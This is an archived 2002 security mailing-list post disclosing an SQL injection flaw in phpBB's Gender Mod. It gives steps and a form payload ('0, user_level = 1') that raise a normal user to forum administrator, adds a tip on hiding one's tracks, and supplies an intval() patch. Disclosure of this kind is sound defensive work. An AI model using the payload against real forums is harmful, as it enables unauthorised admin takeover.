phpBB/gender mod allows get admin privilege, exploit/patch

From: langtuhaohoa caothuvolam (trungonlyat_private)
Date: Sat Jul 27 2002 - 07:16:06 PDT

Next message: Mike Caudill: "Re: Phenoelit Advisory, 0815 ++ * - Cisco_tftp"

Previous message: Arek Suroboyo: "Easy Homepage Creator Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) ######################################################################### ## Annoucement: ## Sua loi thay doi quyen user trong phpbb2.x ## In phpBB with the official Gender Mod, this vuln allows a normal user ## set her/himself to become a forum administrator. ## ## Nguoi viet/Author: PTTrung ## http://hackervn.net (caothuvolam) http://viethacker.net (langtuhaohoa) ## trungonlyat_private ## ## Description: ## Gender Mod is a commonly used modification in official phpBB releases. ## Unchecked posted values can add some SQL fields into the UPDATE sql command. ## This affects in the newest version 1.1.3. ## If you assign the value: 'user_level = 1', you will have the ADMINISTRATOR ## PRIVILEGE in forum. ## ## Exploit: ## 1. Save the User Profile page into your disk to modify it offline. ## 2. Add the correct full post action address (http://forum.victim.com/...): ## <FORM action=http://forum.victim.com/profile.php? sid=<current_session_id> method=post ## encType=multipart/form-data> ## 3. Modify the HTML Form so that the input field "gender" has value like: ## <input type=text name=gender value="0, user_level = 1 "> ## 4. Load this page in the same browser window where the cookie is still available. ## Take care all your works to hide the tracking of your hacking and finally hit Submit ## to change user profile. You've done. ## ## Patch: ## File To Patch: ## forumroot/includes/usercp_register.php ## ## Note. ## The phpBB team has also been emailed about this problem. ## ######################################################################### # Patch # #-----[ OPEN ]------------------------------------------ # forumroot/includes/usercp_register.php # #-----[ FIND ]------------------------------------------ # $gender = ( isset($HTTP_POST_VARS['gender']) ) ? $HTTP_POST_VARS ['gender'] : 0; # #-----[ REPLACE AS ]------------------------------------ # $gender = ( isset($HTTP_POST_VARS['gender']) ) ? intval ($HTTP_POST_VARS['gender']) : 0; # #-----[ SAVE/CLOSE/UPLOAD THIS FILE ]------------------- # # EoP

Next message: Mike Caudill: "Re: Phenoelit Advisory, 0815 ++ * - Cisco_tftp"
Previous message: Arek Suroboyo: "Easy Homepage Creator Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Jul 28 2002 - 00:58:03 PDT